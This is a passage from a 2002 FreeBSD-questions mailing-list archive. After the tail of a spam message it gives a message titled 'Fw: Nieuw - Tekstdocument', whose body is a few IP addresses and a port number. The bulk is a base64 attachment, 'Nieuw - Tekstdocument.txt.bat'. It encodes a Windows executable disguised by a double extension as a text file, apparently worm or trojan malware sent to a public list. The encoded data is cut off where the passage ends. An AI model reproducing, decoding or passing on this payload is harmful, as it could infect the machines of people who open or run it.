or http://3gwireless.com [This is only one-time educational message. Thanks for your support.] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12: 8:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.FreeBSD.ORG (213-84-86-16.adsl.xs4all.nl [213.84.86.16]) by hub.freebsd.org (Postfix) with SMTP id F0F4C37B405 for ; Sun, 23 Jun 2002 12:05:54 -0700 (PDT) From: digital_x To: freebsd-questions@FreeBSD.ORG Subject: Fw: Nieuw - Tekstdocument Date: Sun,23 Jun 2002 21:05:08 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=elgxpud Message-Id: <20020623190554.F0F4C37B405@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --elgxpud Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable 213.73.172.98 62.212.65.228:27015 52rawfda
.
.

--elgxpud Content-Type: application/octet-stream; name=Nieuw - Tekstdocument.txt.bat Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="Nieuw - Tekstdocument.txt.bat" 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 